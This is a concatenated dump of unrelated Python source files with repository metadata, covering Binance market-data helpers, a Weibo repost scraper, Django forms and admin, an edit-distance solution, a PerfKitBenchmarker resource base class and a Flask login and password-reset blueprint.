    handler = tweepy.OAuthHandler(consumer_token, consumer_secret)
    handler.set_access_token(access_token, access_secret)
    client = tweepy.API(handler)
    try:
        client.update_status(msg)
    except tweepy.TweepError:
        return "> Error while posting status to twitter."
    return "> Successfully posted status to twitter."
| UTF-8 | Python | false | false | 689 | py | 6 | twitter.py | 4 | 0.730044 | 0.730044 | 0 | 20 | 33.45 | 64 |
bellyfat/crypto-derivative-trading-engine | 1,176,821,066,278 | 2939cd34491c5b9536504136388eb57a2975a428 | c1fe1de6f1d579437e515cf99e81f71ecfa9e5d5 | /diversifly/components/globals.py | d359a8dd1a9e81cfee908de67f23c7ae63412d67 | []
| no_license | https://github.com/bellyfat/crypto-derivative-trading-engine | 209d364681187fd467275718ed85b27354bfee48 | 11299d3c609f9acf7ef7264cce25c21a59ccc0a9 | refs/heads/main | 2023-05-09T23:47:26.652449 | 2021-06-01T21:48:51 | 2021-06-01T21:48:51 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time as time
import pandas as pd
import numpy as np
from datetime import datetime, timezone, timedelta
import itertools as itertools
from unsync import unsync
from enum import Enum
import logging as logging
logging.basicConfig(format="%(asctime)s - %(message)s", level=logging.INFO)
# python binance
from binance.client import Client
# sockets
from binance.websockets import BinanceSocketManager
from twisted.internet import reactor
def utc_to_local(utc_dt):
    """Interpret naive *utc_dt* as UTC and convert it to the local timezone."""
    aware = utc_dt.replace(tzinfo=timezone.utc)
    return aware.astimezone(tz=datetime.now(timezone.utc).astimezone().tzinfo)
def is_finished_bar(local_timezone_dt):
    """Return 1 if *local_timezone_dt* is already in the past, else 0."""
    local_tz = datetime.now(timezone.utc).astimezone().tzinfo
    return int(local_timezone_dt < datetime.now(local_tz))
# TODO: this should be paralelized
@unsync
def get_finished_bars(client, symbol, STRATEGY_RUN_INTERVAL, since, MARKET):
    """Fetch klines for *symbol* and keep only bars whose close time has passed.

    MARKET selects the endpoint: "SPOT" uses get_historical_klines, "FUT"
    uses futures_klines.  NOTE(review): any other MARKET value leaves
    currency_bars unbound and raises UnboundLocalError - confirm callers
    only ever pass these two values.
    """
    if MARKET == "SPOT":
        currency_bars = pd.DataFrame(client.get_historical_klines(symbol, STRATEGY_RUN_INTERVAL, since),
                                     columns=['date', 'open', 'high', 'low', 'close', 'volume', 'closeTime', 'QAV',
                                              'numberOfTrades', 'd1', 'd2', 'd3'])  # .tail(1)
    elif MARKET == "FUT":
        currency_bars = pd.DataFrame(client.futures_klines(symbol=symbol, interval=STRATEGY_RUN_INTERVAL),
                                     columns=['date', 'open', 'high', 'low', 'close', 'volume', 'closeTime', 'QAV',
                                              'numberOfTrades', 'd1', 'd2', 'd3'])
    # Binance timestamps are epoch milliseconds; convert to pandas datetimes.
    currency_bars.closeTime = pd.to_datetime(currency_bars.closeTime, unit='ms')
    currency_bars.date = pd.to_datetime(currency_bars.date, unit='ms')
    currency_bars["closeTimeLocal"] = currency_bars.closeTime.apply(utc_to_local)  # closeTime, unit='ms')
    currency_bars["finishedBar"] = currency_bars.closeTimeLocal.apply(is_finished_bar)
    # Keep only bars that have already closed in local time.
    currency_bars = currency_bars[currency_bars.finishedBar == 1]
    currency_bars.index = currency_bars.date
    return currency_bars
@unsync
def get_finished_bars2(client, symbol, STRATEGY_RUN_INTERVAL, since, MARKET, limit):
    """Variant of get_finished_bars using short market codes ("S"/"F").

    ``since`` is only used on the spot branch and ``limit`` only on futures.
    Returns the DataFrame indexed by bar open time, or None on any error.
    """
    # NOTE(review): this nested helper shadows the module-level
    # is_finished_bar but is never called - looks like dead code left
    # over from a refactor.
    def is_finished_bar(local_timezone_dt):
        LOCAL_TIMEZONE = datetime.now(timezone.utc).astimezone().tzinfo
        return 1 if local_timezone_dt < datetime.now(LOCAL_TIMEZONE) else 0
    try:
        if MARKET == "S":
            currency_bars = pd.DataFrame(client.get_historical_klines(symbol, STRATEGY_RUN_INTERVAL, since),
                                         columns=['date', 'open', 'high', 'low', 'close', 'volume', 'closeTime', 'QAV',
                                                  'numberOfTrades', 'd1', 'd2', 'd3'])
        elif MARKET == "F":
            currency_bars = pd.DataFrame(
                client.futures_klines(symbol=symbol, interval=STRATEGY_RUN_INTERVAL, limit=limit),
                columns=['date', 'open', 'high', 'low', 'close', 'volume', 'closeTime', 'QAV',
                         'numberOfTrades', 'd1', 'd2', 'd3'])
        # Index the frame by its (datetime) open time.
        currency_bars.date = pd.to_datetime(currency_bars.date, unit='ms')
        currency_bars.index = currency_bars.date
        return currency_bars
    except Exception as e:
        logging.info(f"get_finished_bars - Exception: {e}")
return None | UTF-8 | Python | false | false | 3,301 | py | 16 | globals.py | 13 | 0.63193 | 0.626174 | 0 | 73 | 44.232877 | 119 |
Billdex/weiboSpider | 11,261,404,265,852 | 5e55cab025f017dfbd933fcb03acfe722d5d7e0c | a64b042cb2c154ff7c913c17bd6677b02f2b753b | /relaySpider.py | 1e4b0f0154cbc0ac62c5e2d7234f6a0b427811a6 | []
| no_license | https://github.com/Billdex/weiboSpider | 1e527922e250a32a636eaf5ce154c6e50ca119fb | 7ae539a56fc28f1c30deb65afa99232b15431d6e | refs/heads/master | 2020-06-03T23:42:25.132479 | 2019-06-18T12:30:20 | 2019-06-18T12:30:20 | 191,780,662 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time
import random
import matplotlib.pyplot as plt
from spiderUtils import *
# Fetch the profiles of users who reposted a given Weibo post.
def getRelayUsers(mid, num):
    """Crawl up to *num* reposting users of Weibo post *mid* via the mobile API."""
    Users = []
    for page in range(1, 25000):
        url = 'https://m.weibo.cn/api/statuses/repostTimeline?id={}&page={}'.format(mid, page)
        data = json.loads(getHtmlText(url))
        # Stop when the API signals no more pages or the quota is reached.
        if data['ok'] == 0 or num <= 0:
            return Users
        for relayUser in data['data']['data']:
            UserInfo = dict()
            # This page already includes the full user details, so there is
            # no need to hit a second API for the user info.
            UserInfo['id'] = relayUser['user']['id']
            UserInfo['name'] = relayUser['user']['screen_name']
            UserInfo['gender'] = '女' if relayUser['user']['gender'] == 'f' else '男'
            UserInfo['statuses_count'] = relayUser['user']['statuses_count']
            UserInfo['desc'] = relayUser['user']['description']
            UserInfo['fans_count'] = relayUser['user']['followers_count']
            UserInfo['follow_count'] = relayUser['user']['follow_count']
            printUserInfo(UserInfo)
            Users.append(UserInfo)
            num -= 1
            # Don't crawl too fast or the IP gets banned.
            time.sleep(random.uniform(0.5, 1))
        # Checkpoint progress after every page in case the crawl is interrupted.
        with open('./relayUsersData_cache.json', 'w', encoding='utf-8') as f:
            f.write(json.dumps(Users, ensure_ascii=False))
    return Users
if __name__ == '__main__':
    # A Weibo post by Cai Xukun from 2019-05-07.
    mid = '4369316738673069'
    try:
        # Reuse previously crawled data if a local dump exists.
        with open('./relayUsersData.json', 'r', encoding='utf-8') as f:
            data = json.load(f)
    except:  # NOTE(review): bare except also hides crawl errors - consider OSError/ValueError
        data = getRelayUsers(mid, 10000)
        print(data)
        with open('./relayUsersData.json', 'w', encoding='utf-8') as f:
            f.write(json.dumps(data, ensure_ascii=False))
    # Share of reposts that look like fake accounts.
    fans_fake = 0
    fans_real = 0
    for fansInfo in data:
        # Heuristic: very few posts and very few followers => fake account.
        if fansInfo['statuses_count'] <= 15 and fansInfo['fans_count'] <= 10:
            fans_fake += 1
        else:
            fans_real += 1
    name_list = ['假转发流量', '真转发流量']
    num_list = [fans_fake, fans_real]
    colors = ['gray', 'red']
    # Pie chart of fake vs real repost traffic.
    plt.figure(1, figsize=(6, 6))
    # Pull the second slice slightly out from the pie.
    expl = [0, 0.1]
    plt.pie(x=num_list, explode=expl, labels=name_list, autopct='%3.1f %%', colors=colors, shadow=True)
    plt.rcParams['font.sans-serif'] = ['YouYuan']
    plt.rcParams['axes.unicode_minus'] = False
plt.show() | UTF-8 | Python | false | false | 2,544 | py | 5 | relaySpider.py | 4 | 0.567464 | 0.542699 | 0 | 72 | 31.541667 | 103 |
Cornholius/web_library | 13,769,665,197,883 | c9cd61d9f51b57699806574f887f3da83267f419 | 29b24bad90a48399174da29335f9182e27ef0e82 | /library/forms.py | 7376aef0483a1c26ad0a522f0e12c1a3ef93146f | []
| no_license | https://github.com/Cornholius/web_library | fde9e58cafcd28c56195838d8623c55ade732d69 | 856a51697a0eff9ed5396333f0f6e13cb3e8acd0 | refs/heads/master | 2020-09-25T01:38:11.577269 | 2019-12-09T14:34:50 | 2019-12-09T14:34:50 | 225,890,053 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django import forms
class UserForm(forms.Form):
    """Single unlabeled search box for the library search page."""

    search_field = forms.CharField(
        label='',
        widget=forms.TextInput(attrs={'size': '40'}),
    )
class AddBookForm(forms.Form):
    """Collect author, title and an optional description for a new book."""

    author = forms.CharField(
        max_length=120,
        label='Автор',
        widget=forms.TextInput(attrs={'size': '68'}),
    )
    book_name = forms.CharField(
        max_length=120,
        label='Название',
        widget=forms.TextInput(attrs={'size': '68'}),
    )
    description = forms.CharField(
        required=False,
        label='Описание',
        widget=forms.Textarea(attrs={'rows': 20, 'cols': 70}),
    )
class DeleteBookForm(forms.Form):
    """Identify a book to delete by its author and title."""

    author = forms.CharField(
        max_length=120,
        label='Автор',
        widget=forms.TextInput(attrs={'size': '68'}),
    )
    book_name = forms.CharField(
        max_length=120,
        label='Название',
        widget=forms.TextInput(attrs={'size': '68'}),
    )
| UTF-8 | Python | false | false | 848 | py | 9 | forms.py | 5 | 0.670762 | 0.638821 | 0 | 20 | 39.55 | 111 |
jpawlikow/auth_app | 16,252,156,258,163 | 7cd6825ae8b9def423f3c5c303bc1d28ef80f790 | dcd6b89bf543f4ef533894336daa98eb16bc5628 | /account_app/admin.py | 1f7b6d0d0c5dfb4d52b363f8b363cfe1ed930fb4 | []
| no_license | https://github.com/jpawlikow/auth_app | 9f7bd52a0e02a12e7ed68b09bc36abef8302340a | 5af32754f2de53aeb274676cc8c46ea8da7e1b65 | refs/heads/master | 2022-04-22T16:17:19.338788 | 2020-04-18T11:41:36 | 2020-04-18T11:41:36 | 256,744,635 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from account_app.models import UserProfile, Site
@admin.register(UserProfile)
class UserProfileAdmin(admin.ModelAdmin):
    """Register UserProfile with the stock ModelAdmin behaviour."""
    pass
@admin.register(Site)
class SiteAdmin(admin.ModelAdmin):
    """Register Site with the stock ModelAdmin behaviour."""
    pass
| UTF-8 | Python | false | false | 232 | py | 13 | admin.py | 10 | 0.788793 | 0.788793 | 0 | 12 | 18.333333 | 48 |
abhiabhi94/fulfil-io-trial-project | 19,215,683,715,494 | 6103d513100e6324f1218cabca6e8638797b5b6c | f56e703188ba38034e98a5475de15010648932ab | /product/managers/hook.py | 3e80a0db01bb2f4dfa8c2b2dba497fbe7dc64c1c | []
| no_license | https://github.com/abhiabhi94/fulfil-io-trial-project | ffb64a3f533efc3b1b30e660b2308c5a820f2582 | 627fbc517262ccbe6a2fdac89c695ba4a9fe2e5f | refs/heads/main | 2023-06-25T22:32:51.619299 | 2021-07-30T00:48:55 | 2021-07-30T01:01:01 | 390,752,201 | 7 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
class SubscriberManager(models.Manager):
    """Manager with query helpers for webhook subscriber models."""

    def get_subscribers(self, event):
        """Return a queryset of subscribers whose ``event`` field matches *event*."""
        return self.filter(event=event)
| UTF-8 | Python | false | false | 150 | py | 51 | hook.py | 31 | 0.74 | 0.74 | 0 | 6 | 24 | 40 |
sky-dream/LeetCodeProblemsStudy | 1,872,605,767,070 | 54dd3e60480d697f5d0fe9d203a9f1d8b8a15fb7 | 6d25434ca8ce03f8fef3247fd4fc3a1707f380fc | /[0072][Hard][Edit_Distance]/Edit_Distance_4.py | fbd7c53e9064de801a2378489fcc5d8a91dd7a45 | []
| no_license | https://github.com/sky-dream/LeetCodeProblemsStudy | 145f620e217f54b5b124de09624c87821a5bea1b | e0fde671cdc9e53b83a66632935f98931d729de9 | refs/heads/master | 2020-09-13T08:58:30.712604 | 2020-09-09T15:54:06 | 2020-09-09T15:54:06 | 222,716,337 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # leetcode time cost : 92 ms
# leetcode memory cost : 16.2 MB
# Time Complexity: O(M*N)
# Space Complexity: O(M*N)
# solution 2. dp with recursion
class Solution:
    def minDistance(self, s1, s2) -> int:
        """Return the Levenshtein edit distance between s1 and s2.

        Bottom-up dynamic programming: table[i][j] is the minimum number of
        insert/delete/replace operations turning s1[:i] into s2[:j].
        Time and space are O(len(s1) * len(s2)).
        """
        m, n = len(s1), len(s2)
        table = [[0] * (n + 1) for _ in range(m + 1)]
        # Base cases: transforming to/from the empty string.
        for i in range(m + 1):
            table[i][0] = i
        for j in range(n + 1):
            table[0][j] = j
        for i in range(1, m + 1):
            for j in range(1, n + 1):
                if s1[i - 1] == s2[j - 1]:
                    # Matching characters cost nothing.
                    table[i][j] = table[i - 1][j - 1]
                else:
                    table[i][j] = 1 + min(
                        table[i][j - 1],      # insert
                        table[i - 1][j],      # delete
                        table[i - 1][j - 1],  # replace
                    )
        return table[m][n]
def main():
    """Demo driver: print the edit distance for a sample word pair."""
    word1 = "horse"  # expected distance is 3
    word2 = "ros"
    distance = Solution().minDistance(word1, word2)
    print("return result is ", distance)


if __name__ == '__main__':
    main()
GoogleCloudPlatform/PerfKitBenchmarker | 14,946,486,200,041 | 4d2b5a71db7ad8947620bf729485e973600fc0e4 | ecaba173879f92f24e3c951866fda23c0a4fc426 | /perfkitbenchmarker/resource.py | 6cf140127954e1443578e5b798d9aa63c58bd236 | [
"Classpath-exception-2.0",
"BSD-3-Clause",
"AGPL-3.0-only",
"MIT",
"GPL-2.0-only",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
]
| permissive | https://github.com/GoogleCloudPlatform/PerfKitBenchmarker | 2f4917fd796db4eb90822c557d8fa08a497fbd48 | d0699f32998898757b036704fba39e5471641f01 | refs/heads/master | 2023-09-02T08:14:54.110308 | 2023-09-01T20:28:01 | 2023-09-01T20:28:38 | 21,950,910 | 1,923 | 567 | Apache-2.0 | false | 2023-09-13T22:37:42 | 2014-07-17T17:23:26 | 2023-09-11T14:39:11 | 2023-09-13T22:37:42 | 22,937 | 1,817 | 480 | 255 | Python | false | false | # Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing abstract class for reliable resources.
The Resource class wraps unreliable create and delete commands in retry loops
and checks for resource existence so that resources can be created and deleted
reliably.
"""
import abc
import itertools
import logging
import time
from typing import List
from absl import flags
from perfkitbenchmarker import errors
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
FLAGS = flags.FLAGS
_RESOURCE_REGISTRY = {}
def GetResourceClass(base_class, **kwargs):
  """Returns the subclass with the corresponding attributes.

  Args:
    base_class: The base class of the resource to return
        (e.g. BaseVirtualMachine).
    **kwargs: Every attribute/value of the subclass's REQUIRED_ATTRS that were
        used to register the subclass.

  Raises:
    Exception: If no class could be found with matching attributes.
  """
  registry_key = tuple([base_class.__name__] + sorted(kwargs.items()))
  if registry_key not in _RESOURCE_REGISTRY:
    raise errors.Resource.SubclassNotFoundError(
        'No %s subclass defined with the attributes: %s' %
        (base_class.__name__, kwargs))
  resource_class = _RESOURCE_REGISTRY[registry_key]
  # Stamp the matched attribute values onto the class so instances see them.
  for attr_name, attr_value in kwargs.items():
    setattr(resource_class, attr_name, attr_value)
  return resource_class
class AutoRegisterResourceMeta(abc.ABCMeta):
  """Metaclass which allows resources to automatically be registered."""

  # See BaseResource
  RESOURCE_TYPE: str
  REQUIRED_ATTRS: List[str]

  def __init__(cls, name, bases, dct):
    # Only register classes that define RESOURCE_TYPE and carry every
    # required attribute (the values may still be None on abstract bases).
    if (all(hasattr(cls, attr) for attr in cls.REQUIRED_ATTRS) and
        cls.RESOURCE_TYPE):
      unset_attrs = [
          attr for attr in cls.REQUIRED_ATTRS if getattr(cls, attr) is None]
      # Raise exception if subclass with unset attributes.
      # The base class itself (whose name equals RESOURCE_TYPE) is exempt.
      if unset_attrs and cls.RESOURCE_TYPE != cls.__name__:
        raise Exception(
            'Subclasses of %s must have the following attrs set: %s. For %s '
            'the following attrs were not set: %s.' %
            (cls.RESOURCE_TYPE, cls.REQUIRED_ATTRS, cls.__name__, unset_attrs))
      # Flatten list type attributes with cartesian product.
      # If a class has two list attributes i.e.
      # class Example(AutoRegisterResourceMeta):
      #  CLOUD = ['GCP', 'AWS']
      #  ENGINE = ['mysql', 'postgres']
      #  ....
      # GetResourceClass(Example, CLOUD='GCP', ENGINE='mysql')
      # would return Example.
      attributes = [[cls.RESOURCE_TYPE]]
      for attr in sorted(cls.REQUIRED_ATTRS):
        value = getattr(cls, attr)
        if not isinstance(value, list):
          attributes.append([(attr, value)])
        else:
          attributes.append([(attr, i) for i in value])
      # Cross product: register one key per combination of attribute values.
      for key in itertools.product(*attributes):
        _RESOURCE_REGISTRY[tuple(key)] = cls
    super(AutoRegisterResourceMeta, cls).__init__(name, bases, dct)
class BaseResource(metaclass=AutoRegisterResourceMeta):
"""An object representing a cloud resource.
Attributes:
created: True if the resource has been created.
deleted: True if the resource has been deleted.
user_managed: Whether Create() and Delete() should be skipped.
restored: True if the resource has been restored.
enable_freeze_restore: Whether the resource should use freeze/restore when
the option is specified on the command line. Different benchmarks may want
different resources to have freeze/restore enabled.
create_on_restore_error: Whether to create the resource if there is an issue
while restoring.
delete_on_freeze_error: Whether to delete the resource if there is an issue
while freezing.
create_start_time: The start time of the last create.
delete_start_time: The start time of the last delete.
create_end_time: The end time of the last create.
delete_end_time: The end time of the last delete.
resource_ready_time: The time when the resource last became ready.
metadata: Dictionary of resource metadata.
"""
# The name of the base class (e.g. BaseVirtualMachine) that will be extended
# with auto-registered subclasses.
RESOURCE_TYPE = None
# A list of attributes that are used to register Resource subclasses
# (e.g. CLOUD).
REQUIRED_ATTRS = ['CLOUD']
# Timeout in seconds for resource to be ready.
READY_TIMEOUT = None
# Time between retries.
POLL_INTERVAL = 5
def __init__(
self,
user_managed=False,
enable_freeze_restore=False,
create_on_restore_error=False,
delete_on_freeze_error=False,
):
super(BaseResource, self).__init__()
# Class level attributes does not persist after pickle
# Copy required attributes to the object
for attribute in self.REQUIRED_ATTRS:
setattr(self, attribute, getattr(self, attribute, None))
self.created = user_managed
self.deleted = user_managed
self.user_managed = user_managed
self.restored: bool = False
self.enable_freeze_restore = enable_freeze_restore
self.create_on_restore_error = create_on_restore_error
self.delete_on_freeze_error = delete_on_freeze_error
# Creation and deletion time information
# that we may make use of later.
self.create_start_time = None
self.delete_start_time = None
self.create_end_time = None
self.delete_end_time = None
self.resource_ready_time = None
self.metadata = dict()
def GetResourceMetadata(self):
"""Returns a dictionary of metadata about the resource."""
return self.metadata.copy()
@abc.abstractmethod
def _Create(self):
"""Creates the underlying resource."""
raise NotImplementedError()
def _Restore(self) -> None:
"""Restores the underlying resource from a file.
This method is required if using Restore() with a resource.
"""
raise NotImplementedError()
def _Freeze(self) -> None:
"""Freezes the underlying resource to a long-term, sustainable state.
This method is required if using Restore() with a resource.
"""
raise NotImplementedError()
def _UpdateTimeout(self, timeout_minutes: int) -> None:
"""Updates the underlying resource's timeout after a successful freeze.
This method is required if using Freeze()/Restore() with a resource.
Args:
timeout_minutes: The number of minutes past the current time at which the
resource should be considered expired.
"""
raise NotImplementedError()
@abc.abstractmethod
def _Delete(self):
"""Deletes the underlying resource.
Implementations of this method should be idempotent since it may
be called multiple times, even if the resource has already been
deleted.
"""
raise NotImplementedError()
def _Exists(self):
"""Returns true if the underlying resource exists.
Supplying this method is optional. If it is not implemented then the
default is to assume success when _Create and _Delete do not raise
exceptions.
"""
raise NotImplementedError()
def _WaitUntilRunning(self):
"""Waits until the resource is (or was) running.
Supplying this method is optional. Use it when a resource is created using
an asynchronous create command and its status is verified as running via
repeatedly polling the resource with 'describe' commands.
"""
pass
def _IsReady(self):
"""Return true if the underlying resource is ready.
Supplying this method is optional. Use it when a resource can exist
without being ready. If the subclass does not implement
it then it just returns true.
Returns:
True if the resource was ready in time, False if the wait timed out.
"""
return True
def _IsDeleting(self):
"""Return true if the underlying resource is getting deleted.
Supplying this method is optional. Potentially use when the resource has an
asynchronous deletion operation to avoid rerunning the deletion command and
track the deletion time correctly. If the subclass does not implement it
then it just returns false.
Returns:
True if the resource was being deleted, False if the resource was in a non
deleting state.
"""
return False
def _PreDelete(self):
"""Method that will be called once before _DeleteResource() is called.
Supplying this method is optional. If it is supplied, it will be called
once, before attempting to delete the resource. It is intended to allow
data about the resource to be collected right before it is deleted.
"""
pass
def _PostCreate(self):
"""Method that will be called once after _CreateResource() is called.
Supplying this method is optional. If it is supplied, it will be called
once, after the resource is confirmed to exist. It is intended to allow
data about the resource to be collected or for the resource to be tagged.
"""
pass
def _CreateDependencies(self):
"""Method that will be called once before _CreateResource() is called.
Supplying this method is optional. It is intended to allow additional
flexibility in creating resource dependencies separately from _Create().
"""
pass
def _DeleteDependencies(self):
"""Method that will be called once after _DeleteResource() is called.
Supplying this method is optional. It is intended to allow additional
flexibility in deleting resource dependencies separately from _Delete().
"""
pass
  @vm_util.Retry(retryable_exceptions=(errors.Resource.RetryableCreationError,))
  def _CreateResource(self):
    """Reliably creates the underlying resource."""
    if self.created:
      return
    # Overwrite create_start_time each time this is called,
    # with the assumption that multiple calls to Create() imply
    # that the resource was not actually being created on the
    # backend during previous failed attempts.
    self.create_start_time = time.time()
    self._Create()
    try:
      if not self._Exists():
        raise errors.Resource.RetryableCreationError(
            'Creation of %s failed.' % type(self).__name__)
    except NotImplementedError:
      # _Exists() is optional (see its docstring); when the subclass does
      # not implement it, assume _Create() succeeding means success.
      pass
    self._WaitUntilRunning()
    self.created = True
    self.create_end_time = time.time()
@vm_util.Retry(retryable_exceptions=(errors.Resource.RetryableDeletionError,),
timeout=3600)
def _DeleteResource(self):
"""Reliably deletes the underlying resource."""
# Retryable method which allows waiting for deletion of the resource.
@vm_util.Retry(poll_interval=self.POLL_INTERVAL, fuzz=0, timeout=3600,
retryable_exceptions=(
errors.Resource.RetryableDeletionError,))
def WaitUntilDeleted():
if self._IsDeleting():
raise errors.Resource.RetryableDeletionError('Not yet deleted')
if self.deleted or not self.created:
return
if not self.delete_start_time:
self.delete_start_time = time.time()
self._Delete()
WaitUntilDeleted()
try:
if self._Exists():
raise errors.Resource.RetryableDeletionError(
'Deletion of %s failed.' % type(self).__name__)
except NotImplementedError:
pass
def Restore(self) -> None:
"""Restores a resource instead of creating it.
Raises:
RestoreError: Generic error encompassing restore failures.
"""
# TODO(user): Add usage lock with labels to prevent multiple
# benchmarks from using the same resource concurrently.
logging.info('Restoring resource %s.', repr(self))
try:
self._Restore()
except NotImplementedError as e:
raise errors.Resource.RestoreError(
f'Class {self.__class__} does not have _Restore() implemented but a '
'restore file was provided.') from e
except Exception as e:
raise errors.Resource.RestoreError('Error restoring resource '
f'{repr(self)}') from e
self.restored = True
self.UpdateTimeout(FLAGS.timeout_minutes)
def Create(self, restore: bool = False) -> None:
"""Creates a resource and its dependencies.
Args:
restore: Whether to restore the resource instead of creating. If
enable_freeze_restore is false, this proceeds with creation.
Raises:
RestoreError: If there is an error while restoring.
"""
@vm_util.Retry(poll_interval=self.POLL_INTERVAL, fuzz=0,
timeout=self.READY_TIMEOUT,
retryable_exceptions=(
errors.Resource.RetryableCreationError,))
def WaitUntilReady():
if not self._IsReady():
raise errors.Resource.RetryableCreationError('Not yet ready')
if self.user_managed:
return
if restore and self.enable_freeze_restore:
try:
self.Restore()
return
except errors.Resource.RestoreError:
logging.exception(
'Encountered an exception while attempting to Restore(). '
'Creating: %s', self.create_on_restore_error)
if not self.create_on_restore_error:
raise
self._CreateDependencies()
self._CreateResource()
WaitUntilReady()
if not self.resource_ready_time:
self.resource_ready_time = time.time()
self._PostCreate()
def Freeze(self) -> None:
"""Freezes a resource instead of deleting it.
Raises:
FreezeError: Generic error encompassing freeze failures.
"""
logging.info('Freezing resource %s.', repr(self))
# Attempt to call freeze, failing if unimplemented.
try:
self._Freeze()
except NotImplementedError as e:
raise errors.Resource.FreezeError(
f'Class {self.__class__} does not have _Freeze() implemented but '
'Freeze() was called.') from e
except Exception as e:
raise errors.Resource.FreezeError(
f'Error freezing resource {repr(self)}') from e
# If frozen successfully, attempt to update the timeout.
self.restored = False
self.UpdateTimeout(FLAGS.persistent_timeout_minutes)
def Delete(self, freeze: bool = False) -> None:
"""Deletes a resource and its dependencies.
Args:
freeze: Whether to freeze the resource instead of deleting. If
enable_freeze_restore is false, this proceeds with deletion.
Raises:
FreezeError: If there is an error while freezing.
"""
if self.user_managed:
return
# Some resources (specifically VMs) lazily compute their metadata rather
# than computing it after provisioning and stashing in their metadata dict
# or static fields as they are supposed to.
# Asking for metadata before deleting it should cache it and make it
# available after we tear down resources, which is necessary for attaching
# metadata in benchmark_spec.GetSamples()
self.GetResourceMetadata()
if freeze and self.enable_freeze_restore:
try:
self.Freeze()
return
except errors.Resource.FreezeError:
logging.exception(
'Encountered an exception while attempting to Freeze(). '
'Deleting: %s', self.delete_on_freeze_error)
if not self.delete_on_freeze_error:
raise
self._PreDelete()
self._DeleteResource()
self.deleted = True
self.delete_end_time = time.time()
self._DeleteDependencies()
def UpdateTimeout(self, timeout_minutes: int) -> None:
"""Updates the timeout of the underlying resource.
Args:
timeout_minutes: The number of minutes past the current time at which the
resource should be considered expired.
Raises:
NotImplementedError: If the resource has not implemented _UpdateTimeout().
"""
logging.info('Updating timeout for %s.', repr(self))
try:
self._UpdateTimeout(timeout_minutes)
except NotImplementedError:
logging.exception(
'Class %s does not have _UpdateTimeout() implemented, which is '
'needed for Freeze(). Please add an implementation.', self.__class__)
raise
def GetSamples(self) -> List[sample.Sample]:
"""Get samples relating to the provisioning of the resource."""
# This should not be necessary. Resources are responsible to wire their
# GetResourceMetadata into publisher.py, but some do not.
metadata = self.GetResourceMetadata()
metadata['resource_type'] = self.RESOURCE_TYPE
metadata['resource_class'] = self.__class__.__name__
samples = []
if self.create_start_time and self.create_end_time:
samples.append(
sample.Sample(
'Time to Create',
self.create_end_time - self.create_start_time,
'seconds',
metadata,
)
)
if self.create_start_time and self.resource_ready_time:
samples.append(
sample.Sample(
'Time to Ready',
self.resource_ready_time - self.create_start_time,
'seconds',
metadata,
)
)
if self.delete_start_time and self.delete_end_time:
samples.append(
sample.Sample(
'Time to Delete',
self.delete_end_time - self.delete_start_time,
'seconds',
metadata,
)
)
return samples
| UTF-8 | Python | false | false | 17,842 | py | 1,120 | resource.py | 818 | 0.677559 | 0.676494 | 0 | 514 | 33.712062 | 80 |
afcarl/Thor-Server | 10,084,583,223,026 | 137237b603812b8f69de9d04f1458febbd36f282 | 3e3f0c127ab5750d6bf37e2e6a922f69cb3e0114 | /website/views/login.py | e151f60cd61999737c680cc232242f55dff7af29 | [
"MIT"
]
| permissive | https://github.com/afcarl/Thor-Server | 823ecbf8c23e756e17ba5cd4def17f384b6dbf9c | 1acaf7436b22100ef241c779365fb0297165c063 | refs/heads/master | 2020-09-04T17:36:13.759521 | 2018-06-04T10:41:52 | 2018-06-04T10:41:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Blueprint, render_template, redirect, flash, request, url_for
from flask_login import login_user, logout_user, login_required
from ..utils import require_unauthed, ts, send_email
from ..forms import LoginForm, EmailForm, PasswordForm
from ..models import User
from .. import db
login = Blueprint("login", __name__)
@login.route("/login/", methods=["GET", "POST"])
@require_unauthed
def login_page():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(
username=form.username.data
).first()
login_user(user, form.remember_me.data)
flash("Logged in successfully!", "success")
next = request.args.get("next")
return redirect(next or url_for("index.page"))
return render_template("login.jinja2", form=form)
@login.route("/logout/")
@login_required
def logout_page():
logout_user()
flash("Logged out successfully!", "success")
return redirect(url_for("index.page"))
@login.route('/reset/', methods=["GET", "POST"])
@require_unauthed
def reset():
    """Email the account owner a timed, signed link to reset their password."""
    form = EmailForm()
    if form.validate_on_submit():
        # Send an email to the user requesting to change the account's password.
        user = User.query.filter_by(email=form.email.data).first_or_404()
        subject = "Password reset requested"
        # Here we use the URLSafeTimedSerializer we created.
        # The "recover-key" salt must match the one used in reset_with_token().
        token = ts.dumps(user.email, salt="recover-key")
        recover_url = url_for("login.reset_with_token", token=token, _external=True)
        html = render_template("email/recover.jinja2", recover_url=recover_url)
        send_email(user.email, subject, html)
        flash("Sent password reset request to {}".format(form.email.data),
              "success")
        return redirect(url_for("index.page"))
    return render_template("reset.jinja2", form=form)
@login.route('/reset/<token>', methods=["GET", "POST"])
@require_unauthed
def reset_with_token(token):
try:
email = ts.loads(token, salt="recover-key", max_age=86400)
except:
abort(404)
form = PasswordForm()
if form.validate_on_submit():
user = User.query.filter_by(email=email).first_or_404()
user.password = form.password.data
db.session.commit()
flash("Successfully reset password!", "success")
return redirect(url_for("login.login_page"))
return render_template("reset_with_token.jinja2", form=form, token=token)
| UTF-8 | Python | false | false | 2,465 | py | 55 | login.py | 33 | 0.656795 | 0.649493 | 0 | 74 | 32.310811 | 84 |
